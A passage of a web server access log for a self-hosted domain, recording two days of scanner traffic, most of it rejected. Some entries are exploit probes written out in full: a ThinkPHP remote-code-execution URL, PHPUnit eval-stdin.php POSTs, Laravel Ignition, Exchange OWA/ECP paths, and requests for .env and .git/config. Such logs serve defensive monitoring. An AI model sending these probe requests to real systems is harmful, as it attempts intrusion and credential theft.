161.35.188.242] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [25/Nov/2021:05:32:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:05:35:50 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:06:09:45 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:10:08 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:10:25 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:10:26 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:10:44 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:11:02 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:12:01 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:12:02 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:12:02 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:12:02 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:12:03 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:12:24 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:12:24 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:12:24 +0000] 400 - - https localhost "-" [Client 18.218.88.0] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:06:27:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [25/Nov/2021:06:29:24 +0000] 400 - - https localhost "-" [Client 191.96.168.242] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:06:44:18 +0000] 400 - - https localhost "-" [Client 185.157.77.112] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:07:00:00 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.204.99] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Nov/2021:07:36:33 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [25/Nov/2021:07:36:33 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [25/Nov/2021:08:23:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Nov/2021:10:20:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.140] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Nov/2021:10:43:41 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [25/Nov/2021:10:43:41 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [25/Nov/2021:10:46:05 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:10:55:53 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [25/Nov/2021:10:55:54 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [25/Nov/2021:13:49:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 190.212.140.11] [Length 252] [Gzip -] "curl/7.58.0" "-" [25/Nov/2021:14:12:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Nov/2021:14:37:43 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:14:39:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.138.108.207] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [25/Nov/2021:14:39:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.138.108.207] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [25/Nov/2021:14:39:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.138.108.207] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [25/Nov/2021:14:39:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 103.138.108.207] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [25/Nov/2021:14:39:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 103.138.108.207] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [25/Nov/2021:14:39:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 103.138.108.207] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" [25/Nov/2021:17:01:16 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:17:48:49 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [25/Nov/2021:17:48:50 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [25/Nov/2021:18:04:30 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Nov/2021:18:04:30 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Nov/2021:18:04:30 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Nov/2021:18:04:30 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Nov/2021:18:04:30 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Nov/2021:18:04:30 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Nov/2021:18:18:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.2.69.50] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [25/Nov/2021:18:18:36 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.101.173] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:18:18:37 +0000] 444 - OPTIONS https localhost "/" [Client 193.32.126.151] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:18:18:38 +0000] 400 - - https localhost "-" [Client 193.32.126.151] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:18:18:46 +0000] 400 - - https localhost "-" [Client 193.32.126.151] [Length 154] [Gzip -] "-" "-" [25/Nov/2021:19:20:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [25/Nov/2021:19:22:56 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.105.7.147] [Length 0] [Gzip -] "-" "-" [25/Nov/2021:20:10:19 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:20:28:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Nov/2021:20:32:23 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.200.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Nov/2021:20:35:37 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.195.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Nov/2021:20:36:18 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.209.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Nov/2021:20:58:45 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [25/Nov/2021:20:58:45 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [25/Nov/2021:21:00:29 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:21:38:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 176.58.116.176] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [25/Nov/2021:21:51:12 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:22:45:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:23:07:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Nov/2021:23:39:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [25/Nov/2021:23:39:10 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211126073610" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [25/Nov/2021:23:42:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Nov/2021:00:09:46 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [26/Nov/2021:00:10:25 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:00:10:26 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:00:19:34 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.78] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Nov/2021:00:42:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Nov/2021:01:59:59 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [26/Nov/2021:01:59:59 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [26/Nov/2021:02:43:13 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.206.238] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Nov/2021:02:49:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.252] [Length 0] [Gzip -] "-" "-" [26/Nov/2021:02:55:38 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:02:55:39 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:03:26:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 62.210.188.203] [Length 0] [Gzip -] "libwww-perl/6.58" "-" [26/Nov/2021:03:26:39 +0000] 400 - HEAD http localhost "/" [Client 157.245.149.16] [Length 0] [Gzip -] "-" "-" [26/Nov/2021:03:26:41 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 157.245.149.16] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:41 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 157.245.149.16] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:43 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 157.245.149.16] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:43 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 157.245.149.16] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:44 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 157.245.149.16] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:45 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 157.245.149.16] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:47 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 157.245.149.16] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:47 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 157.245.149.16] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:48 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 157.245.149.16] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [26/Nov/2021:03:26:49 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 157.245.149.16] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [26/Nov/2021:03:26:50 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 157.245.149.16] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:51 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 157.245.149.16] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:52 +0000] 400 - GET http 64.22.31.253 "/gemini-iptv/vod.json" [Client 157.245.149.16] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:53 +0000] 444 - GET https 64.22.31.253 "/gemini-iptv/vod.json" [Client 157.245.149.16] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:54 +0000] 400 - GET http 64.22.31.253 "/" [Client 157.245.149.16] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:26:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 157.245.149.16] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Nov/2021:03:27:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.44] [Length 0] [Gzip -] "-" "-" [26/Nov/2021:03:27:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.44] [Length 252] [Gzip -] "-" "-" [26/Nov/2021:03:27:35 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [26/Nov/2021:03:33:09 +0000] 444 - GET https whoami.moralanimal.net "/.git/config" [Client 185.220.101.15] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [26/Nov/2021:03:52:59 +0000] 400 - GET http 64.22.31.253 "/" [Client 139.59.16.81] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [26/Nov/2021:03:53:00 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 139.59.16.81] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [26/Nov/2021:04:36:23 +0000] 400 - GET http localhost "/h8zB" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [26/Nov/2021:05:09:16 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [26/Nov/2021:05:09:37 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:05:09:37 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:05:41:00 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:05:41:01 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:05:55:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [26/Nov/2021:06:55:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [26/Nov/2021:06:55:01 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [26/Nov/2021:06:57:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Nov/2021:07:02:09 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.215.137] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Nov/2021:07:33:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [26/Nov/2021:07:35:41 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 34.77.162.8] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [26/Nov/2021:07:46:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.173.35.61] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Nov/2021:08:13:37 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:08:13:37 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:08:20:11 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:08:20:11 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:09:05:38 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 146.70.20.247] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "-" [26/Nov/2021:09:05:40 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 146.70.20.247] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "-" [26/Nov/2021:09:23:32 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:09:23:32 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Nov/2021:09:37:31 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [26/Nov/2021:10:24:38 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 34.86.35.16] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [26/Nov/2021:10:30:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.196.174] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Nov/2021:10:45:48 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; 